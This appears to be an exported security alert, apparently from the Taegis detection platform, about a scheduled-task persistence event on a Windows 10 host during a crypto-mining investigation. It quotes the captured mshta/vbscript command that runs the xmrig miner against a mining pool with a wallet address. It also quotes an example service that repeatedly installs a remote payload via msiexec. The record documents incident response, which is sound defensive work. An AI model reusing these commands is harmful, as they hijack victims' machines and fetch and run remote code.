Persistent Creation of a Windows Scripting Host Automation Object
Details
Status:
Status Reason: None
First Activity: 2024/03/06 12:16:59 UTC (22 days ago)
Last Activity: 2024/03/06 12:16:59 UTC (22 days ago)
Inserted At: 2024/03/06 12:29:24 UTC (22 days ago)
First Investigated: 2024/03/06 17:28:42 UTC (22 days ago)
First Resolved: 2024/03/15 18:22:04 UTC (13 days ago)
Severity: Critical (0.99)
Threat Score: 9.9
Tenant:
Detector: Taegis Watchlist
Tactics: Execution, Persistence, Privilege Escalation, Defense Evasion
Sensor Types: Taegis
Confidence: 100%
Hostname:
Agent/Sensor ID:
Investigations: 2024-03-06 - [CS] Crypto Mining Investigation - PCUS0382
Occurrence Count: 1
Grouped by (Group Key): 96072:app:event-filter:persistence:12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1:432988c18aef458a8a8a95f56a98eba6:[mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)]:2024-02-29
Affected Agents (1)
PCUS0382
Last Updated: 2024/03/28 07:17:16 UTC
OS Distributor: Microsoft
OS Family: WINDOWS
OS Version: Windows 10
Most Recent Address: 172.16.20.11
Open alerts (0) for Related Entities
Open alerts within past 72 hours from alert creation: NO DATA
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6): 0
Hostname (PCUS0382): 0
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1): 0
Closed alerts (99) for Related Entities
Closed alerts within past 30 days from alert creation:
Agent/Sensor ID (432988c18aef458a8a8a95f56a98eba6): 26
Hostname (PCUS0382): 72
Similar Alert Titles based on Rule ID (12a44d4a-d3f2-4a27-a8fa-e34b2f4967a1): 1
Open or closed investigations (6) for Related Entities
Open or closed investigations within past 30 days:
File (mshta): 2
Host (432988c18aef458a8a8a95f56a98eba6): 2
Task Name (MSOFFICEER): 2
A persistence event was identified in which a Windows Scripting Host automation object was created. This may indicate that an adversary is attempting to execute malicious content repeatedly.
Example:
> Service Name: SMMq
> Display Name: SMMq
> Description:
> Type: SERVICE_WIN32_OWN_PROCESS
> Start Type: SERVICE_AUTO_START
> Image Path: mshta.exe vbscript:createobject("wscript.shell").run("Cmd.exe /c for /l %i in (1 1 66) do (Msiexec /i Hxxp://Gk.Vwxqv.Xyz/SMB1.jpg /Q)",0)(window.close)
External References
No external references for this alert.
First Event Details
Persistence
SCHEDULED_TASK mshta vbscript:CreateObject("Wscript.Shell").("C:\Users\brandon.perry\xmrig.exe --donate-level 1 -o monerohash.com:2222 -u 84XFxjQVYoJjQBeyfbcYBgJ1tw4cgywGyTp12nQw3mSKZctgMYuPGRH1y2LuBAS8yyT8ZX2NDS3CXbfFAxdXQJwAGMoMDSq -p x -k",0,true)(window.close)
Event Time: 2024/03/06 12:16:59 UTC · 22 days ago
Ingest Time: 2024/03/06 12:29:15 UTC · 22 days ago
Category: SCHEDULED_TASK
Operation: ADDED
Hostname: PCUS0382
Sensor ID: 432988c18aef458a8a8a95f56a98eba6
Tenant: (96072)